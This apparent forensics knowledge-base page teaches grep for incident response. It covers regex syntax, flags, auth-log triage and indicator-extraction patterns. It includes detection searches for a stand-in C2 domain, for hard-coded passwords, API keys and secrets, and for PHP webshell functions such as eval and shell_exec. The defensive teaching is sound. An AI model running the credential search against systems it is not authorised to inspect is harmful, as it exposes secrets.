defencia/knowledge/linux/grep
Pattern matching · The DFIR workhorse

grep

grep finds lines that match a pattern. It sounds simple, and that is exactly why it is the single most useful text tool in an investigation — point it at a log, a config, or an entire mounted disk image and it surfaces the lines that matter. The name comes from an old editor command, g/re/p: "globally search a regular expression and print".

Built inEvery distro

The basic shape

Every grep command is the same three parts: the tool, a pattern to look for, and where to look.

$ grep "pattern" file.txt
  │     │         └── where to search (a file, or many files)
  │     └──────────── the pattern (plain text or a regex)
  └────────────────── the command
Quote the pattern. It protects spaces and special characters from being eaten by the shell.

It also reads from a pipe, which is how it spends most of its life in DFIR — filtering the output of another command:

$ cat /var/log/auth.log | grep "Failed"
$ ps aux | grep -i nginx
$ dpkg -l | grep openssl
Anything that produces text can be narrowed by piping it into grep.
Three names, one tool. grep uses basic regex; egrep (or grep -E) uses extended regex with no backslash-escaping of + ? { } ( ) |; fgrep (or grep -F) treats the pattern as a fixed string with no regex at all. Reach for grep -E by default — the extended syntax is the one most references assume.

Regular expressions in 5 minutes

A regular expression (regex) is a tiny language for describing text patterns. You do not need all of it — a handful of symbols covers almost everything an investigator asks for.

SymbolMatchesExample
.Any single characterr..t → root, rest, r4xt
*Zero or more of the previousab*c → ac, abc, abbc
+One or more of the previousab+c → abc, abbc (not ac)
?Zero or one (optional)colou?r → color, colour
^Start of the line^Error → lines beginning Error
$End of the linefailed$ → lines ending failed
[ ]Any one character from the set[0-9] → a digit
[^ ]Any character not in the set[^0-9] → a non-digit
( )Group, often with |(GET|POST)
|OR — either sideerror|fail
{n}Exactly n of the previous[0-9]{3} → three digits
\Escape — treat a special char literally\. → a literal dot
\bWord boundary\bcat\b → "cat", not "category"
The dot is not a dot. In regex, . means "any character", so 192.168.0.1 also matches 192x168y0z1. To match a literal dot — as in IPs, domains and file extensions — escape it: 192\.168\.0\.1. This trips up everyone at first.
Character class shorthands (with grep -P or POSIX)
ShorthandMeansPOSIX equivalent
\dA digit[[:digit:]]
\wA word character (letter, digit, _)[[:alnum:]_]
\sWhitespace[[:space:]]

\d \w \s need Perl mode (grep -P). With plain grep -E, use the POSIX classes or explicit ranges like [0-9].

The flags that matter

grep has dozens of options; these are the ones you will actually use. Most can be combined.

Matching behaviour
FlagEffect
-iCase-insensitive. grep -i error catches Error, ERROR, error.
-vInvert — show lines that do not match. Great for filtering out noise.
-wWhole word only. grep -w cat ignores "category".
-xWhole line must match exactly.
-EExtended regex (use + ? { } ( ) | without backslashes).
-PPerl-compatible regex — enables \d \w \s, lookarounds.
-FFixed string — no regex, faster, and safe for patterns full of special characters.
Searching files and trees
FlagEffect
-r / -RRecursive — search every file under a directory. -R also follows symlinks.
-lList only the filenames that contain a match — not the lines.
-LList files that do not contain the match.
--include="*.log"Only search files matching a glob.
--exclude-dir=node_modulesSkip whole directories.
-aTreat binary files as text — search inside them anyway.
Output and context
FlagEffect
-nShow the line number of each match — so you can jump straight to it.
-cCount matching lines instead of printing them.
-oPrint only the matched text, not the whole line. Essential for extracting IOCs.
-HAlways show the filename (default when searching many files).
-A 3Print 3 lines after each match.
-B 3Print 3 lines before each match.
-C 3Print 3 lines of context on both sides.
--color=autoHighlight the match. Often on by default; worth knowing the name.
Combine freely. grep -rniE "pattern" /path = recursive, case-insensitive, with line numbers, using extended regex. This one combination handles a large share of real searches.

DFIR examples

Where grep earns its keep. These are the searches you reach for during a real investigation — reading logs, hunting across a mounted image, and isolating indicators.

Reading authentication logs
# Every failed login attempt
$ grep "Failed password" /var/log/auth.log

# Successful logins — who got in
$ grep "Accepted" /var/log/auth.log

# Failed logins with 3 lines of context, line-numbered
$ grep -n -A3 "Failed password" /var/log/auth.log

# Count failures per source IP, ranked
$ grep "Failed password" /var/log/auth.log | grep -oE "[0-9]{1,3}(\.[0-9]{1,3}){3}" | sort | uniq -c | sort -rn
The last line is a complete brute-force triage: find failures, extract the IP with -oE, then count and rank. This pattern recurs constantly.
Searching across a mounted image or directory tree
# Find every file mentioning a suspicious domain, just the filenames
$ grep -rl "evil-c2.example" /mnt/evidence

# Hunt for hard-coded credentials across a codebase
$ grep -rniE "(password|passwd|api[_-]?key|secret)\s*=" /mnt/evidence 2>/dev/null

# Search only PHP files for a webshell signature
$ grep -rn --include="*.php" -E "(eval|base64_decode|system|shell_exec)\s*\(" /var/www

# Look inside a binary for embedded strings
$ grep -a "http" suspicious.bin
-rl gives you the list of files to examine next; -rni shows you exactly where. The webshell search is a classic first pass on a compromised web server.
Filtering out noise with -v
# Show running processes, minus the grep line itself
$ ps aux | grep ssh | grep -v grep

# All log lines except routine health checks
$ grep -v "200" access.log | grep -v "health"
grep -v grep is a daily habit — it removes the grep command from its own results.
Extracting indicators with -o
# Pull every unique IP address out of a log
$ grep -oE "[0-9]{1,3}(\.[0-9]{1,3}){3}" access.log | sort -u

# Extract all email addresses from a file
$ grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" dump.txt | sort -u

# Find URLs in a captured payload
$ grep -oE "https?://[^\"' ]+" payload.txt | sort -u
-o turns grep from a line-finder into an extractor — exactly what you want when building an IOC list. sort -u de-duplicates.

Copy-ready IOC patterns

Common indicator patterns for use with grep -oE (extended regex). Pair each with | sort -u to get a clean, unique list.

IndicatorPattern
IPv4 address[0-9]{1,3}(\.[0-9]{1,3}){3}
Email address[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}
URL (http/https)https?://[^\"' ]+
Domain name([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}
MD5 hash\b[a-fA-F0-9]{32}\b
SHA-1 hash\b[a-fA-F0-9]{40}\b
SHA-256 hash\b[a-fA-F0-9]{64}\b
Bitcoin address\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}\b
MAC address([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}
Base64 blob (long)[A-Za-z0-9+/]{40,}={0,2}
These match shape, not validity. The IPv4 pattern will happily match 999.999.999.999, and the hash patterns match any hex string of the right length. They are for fast extraction and triage — validate and correlate the hits before treating anything as a confirmed indicator.
# Pull every SHA-256 hash from an incident report and sort uniquely
$ grep -oE "\b[a-fA-F0-9]{64}\b" report.txt | sort -u

# Build an IP watchlist from a week of logs, ranked by frequency
$ grep -hoE "[0-9]{1,3}(\.[0-9]{1,3}){3}" /var/log/nginx/*.log | sort | uniq -c | sort -rn
-h suppresses filenames when searching multiple files, keeping the extracted list clean.
Ready for the rest of the toolkit? Head back to the Linux guide for find, awk, strings and evidence hashing, or open the full Linux commands cheatsheet.